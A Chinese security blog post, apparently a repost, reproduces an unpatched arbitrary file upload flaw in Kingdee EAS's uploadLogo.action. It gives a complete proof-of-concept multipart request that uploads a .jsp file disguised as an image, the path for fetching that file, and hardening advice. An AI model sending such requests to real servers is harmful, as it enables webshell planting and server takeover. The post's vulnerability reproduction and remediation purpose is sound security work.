首页 > 其他分享 >【漏洞复现】金蝶OA-EAS系统 uploadLogo.action 任意文件上传漏洞(0day)

【漏洞复现】金蝶OA-EAS系统 uploadLogo.action 任意文件上传漏洞(0day)

时间:2023-11-20 10:46:50浏览次数:32  
标签:文件 金蝶 -- 0day OA Content 漏洞 EAS 上传

阅读须知

        此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

产品介绍

        金蝶EAS Cloud为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台,帮助企业链接外部产业链上下游,实现信息共享、风险共担,优化生态圈资源配置,构筑产业生态的护城河,同时打通企业内部价值链的数据链条,实现数据不落地,管理无断点,支撑“横向到边”财务业务的一体化协同和“纵向到底”集团战略的一体化管控,帮助企业强化核心竞争力。

漏洞概述

        金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶 EAS 及 EAS Cloud 在 uploadLogo.action 存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。

漏洞影响

金蝶OA EAS系统

漏洞复现

登录页面

验证POC:

POST /plt_portal/setting/uploadLogo.action HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Forwarded-For: 
Content-Length: 632
Content-Type: multipart/form-data; boundary=04844569c7ca7d21a3ca115dca477d62
​
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="chooseLanguage_top"; filename="chooseLanguage_top"
​
ch
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="dataCenter"; filename="dataCenter"
​
xx
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="insId"; filename="insId"
​
​
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="type"; filename="type"
​
top
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="upload"; filename="test.jsp"
Content-Type: image/png
​
test
--04844569c7ca7d21a3ca115dca477d62--

上传路径:

GET /portal/res/file/upload/xxx.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Forwarded-For: 
​

修复建议

目前,金蝶OA官方暂未发布补丁,临时解决方案如下:
1、对上传文件类型进行验证,除在前端验证外在后端依然要做验证,后端可以进行扩展名检测,重命名文件,MIME类型检测以及限制上传文件的大小等限制来防御,或是将上传的文件其他文件存储服务器中。
2、严格限制和校验上传的文件,禁止上传恶意代码的文件。同时限制相关上传文件目录的执行权限,防止木马执行。
3、对上传文件格式进行严格校验,防止上传恶意脚本文件。
4、严格限制上传的文件路径。
5、文件扩展名服务端白名单校验。
6、文件内容服务端白名单校验。
7、上传文件重命名。
8、隐藏上传文件路径。

标签:文件,金蝶,--,0day,OA,Content,漏洞,EAS,上传
From: https://www.cnblogs.com/spmonkey/p/17843406.html

相关文章

  • 关于AD原理图中的Floating Net Label错误
    编译之后提示如下:直接双击错误跳转这是说标签浮空,没有连接到导线上这里将导线和电阻重新连接,就解决了报错还有另外一种常见的错误如下:这是标签没有连接到导线上,放大原理图并选中标签,结果如下标签左下角有个十字,必须将它放到导线上,放完之后即可解决问题(如果不好调整可以......
  • 浮点数格式: FP64, FP32, FP16, BFLOAT16, TF32
    浮点数格式(参考1,参考2)浮点数是一种用二进制表示的实数,它由三个部分组成:sign(符号位)、exponent(指数位)和fraction(小数位)。不同的浮点数格式有不同的位数分配给这三个部分,从而影响了它们能表示的数值范围和精度。例如: 下面是一些常见的浮点数格式的介绍:FP64(双精度浮点数):用64位......
  • 漏洞挖掘方法论
    1.资产类型你想挖什么方向的漏洞:Iot,web,web3,底层协议,移动APP,APIs等。2.资产范围确认资产范围是什么?其他注意事项有什么?3.报告模板如果一份“商业化”报告模板无法清晰表达最重要的信息,或者表达时缺失了关键性信息。那就不需要这个“商业化”报告。一句话,只要你能把来龙去脉描......
  • 360OS官方刷机助手QIKU Download Assistant破解补丁
    使用前必看:目前只绕过了新版本校验、ROM数据校验。ROM数据校验成功后的步骤作者没测试过,是否能升级成功是不确定的!使用前请知晓!!!目前只绕过了新版本校验、ROM数据校验。ROM数据校验成功后的步骤作者没测试过,是否能升级成功是不确定的!使用前请知晓!!!目前只绕过了新版本校验、ROM数......
  • Learning to rank: from pairwise approach to listwise approach
    目录概ListNetPermutationProbabilityTop-kProbabilityCaoZ.,QinT.,LiuT.,TsaiM.andLiH.Learningtorank:frompairwiseapproachtolistwiseapproach.ICML,2008.概ListwiseRanking.ListNet以文档检索为例,假设我们有query\(q\)和一堆候选的文档......
  • 内存安全问题之 use-after-free 漏洞的介绍
    计算机安全领域中的"use-after-free"漏洞是一种常见的内存安全问题。该漏洞类型源自于程序错误,通常发生在应用程序或操作系统中。"Use-after-free"漏洞指的是在释放(free)了某块内存后,程序继续使用了已释放的内存区域,可能导致严重的安全问题。这种漏洞对计算机系统和用户数据构成严......
  • 什么是计算机安全领域的 use-after-free 漏洞
    在计算机安全领域,use-after-free是一种重要的安全漏洞类型。要理解use-after-free漏洞,我们首先需要了解计算机内存管理的基础知识。计算机程序在运行时,会使用到计算机的内存资源。内存是一个有限的资源,不可能无限制地使用。因此,程序在使用内存时,必须遵循一个规则:在使用完一个......
  • Mysql报:error while loading shared libraries libtinfo.so.5的解决办法
    版权声明:原创作品,谢绝转载!否则将追究法律责任。—————作者:kirin#、今天闲来无事,想在Anolis8的系统上装一个MySQL8.0玩。前期在安装和配置的过程中没有什么问题,但是在我想查看一下数据库版本的时候报了一个错。具体报错信息如下:mysql:errorwhileloadingsharedlibrarie......
  • Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
    ApacheShiro1.2.4反序列化漏洞(CVE-2016-4437)ApacheShiro是一款开源安全框架,提供身份认证、授权、密码学和会话管理。Shiro框架直观、易用,同时也提供健壮的安全性。ApacheShiro1.2.4以及以前部版本中,加密的用户信息序列号后存储在名为remember-me的Cookie中,攻击者开源使用Shi......
  • UVA10652 Board Wrapping 题解
    LinkUVA10652BoardWrappingQuestion给出\(N\)个矩形,求面积最小的凸多边形能包住所有矩形求矩形面积占凸多边形面积的百分比Solution把矩形的四个顶点拿出来,就可以转化成凸包裸题了Code#include<bits/stdc++.h>usingnamespacestd;constdoubleeps=1e-9;constd......